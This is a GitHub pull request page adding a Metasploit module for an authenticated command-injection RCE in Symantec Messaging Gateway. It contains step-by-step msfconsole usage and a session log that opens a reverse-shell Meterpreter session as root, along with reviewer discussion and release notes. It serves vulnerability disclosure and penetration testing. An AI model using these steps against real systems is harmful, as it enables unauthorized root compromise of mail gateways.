
Adding module Symantec Messaging Gateway RCE #8540

Merged
merged 2 commits into from Jun 23, 2017

@mmetince
Contributor

commented Jun 10, 2017

This module exploits a command injection vulnerability in the Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the root user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/symantec_messaging_gateway_exec
  • set RHOST <12.0.0.199>
  • set USERNAME admin. It's the username of the management portal and it's admin by default.
  • set PASSWORD <Passw0rd>
  • set SSH_ADDRESS <12.0.0.15>. Replace the IP with your own server where you are running your own SSH service (Kali etc.).
  • set SSH_USERNAME <root>. Replace the username of the SSH service if needed.
  • set SSH_PASSWORD <toor>. Replace the password of the SSH user if needed.
  • set LHOST <12.0.0.1>
  • exploit
  • Verify the following output.
msf > use exploit/linux/http/symantec_messaging_gateway_exec 
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
  • Documentation is also included with this PR. You can see details about where and how to download this product.

All the technical details about this vulnerability can be found at the following URL.
https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/

THINGS TO DO

  • Grammar issues. (Please leave a note if you spot any grammar issues.)
  • Although they are not willing to do this, I need to get a CVE number from Symantec. I have a big mailing loop with them. I believe we are going to get the CVE assignment next week. It's done.

Thanks all.

@dmohanty-r7

Contributor

commented Jun 15, 2017

Awesome, @mmetince, nice find! Any chance you might know where to download an archived 10.6.2 version for verification? (The Symantec website seems to only provide the latest 10.6.3. https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken?inid=us_symc_messaging-gateway_pdp_to_leadgen_trialware_PID-20_messaging-gateway# shows the product version but a disabled archived versions tab.)

@mmetince

Contributor Author

commented Jun 16, 2017

@dmohanty-r7 I downloaded the 10.6.2 version from exactly the same page 2 days ago. It seems they also released the latest ISO as well.

I'm uploading the 10.6.2 ISO to one of my servers. Could you please send me your SSH public key?

@mmetince

Contributor Author

commented Jun 18, 2017

@dmohanty-r7 Finally, I've managed to upload it. I've delivered the details to msfdev@metasploit.com by e-mail. Let me know if you have any issue accessing it over ssh/scp.

@dmohanty-r7

Contributor

commented Jun 22, 2017

@mmetince It exploits successfully in my ESXi environment... Great work!

@dmohanty-r7 dmohanty-r7 merged commit c147779 into rapid7:master Jun 23, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
dmohanty-r7 added a commit that referenced this pull request Jun 23, 2017
@dmohanty-r7

Contributor

commented Jun 23, 2017

Release Notes

The exploits/linux/http/symantec_messaging_gateway_exec module has been added to the framework. This module exploits the command injection vulnerability of the Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the web server root user.
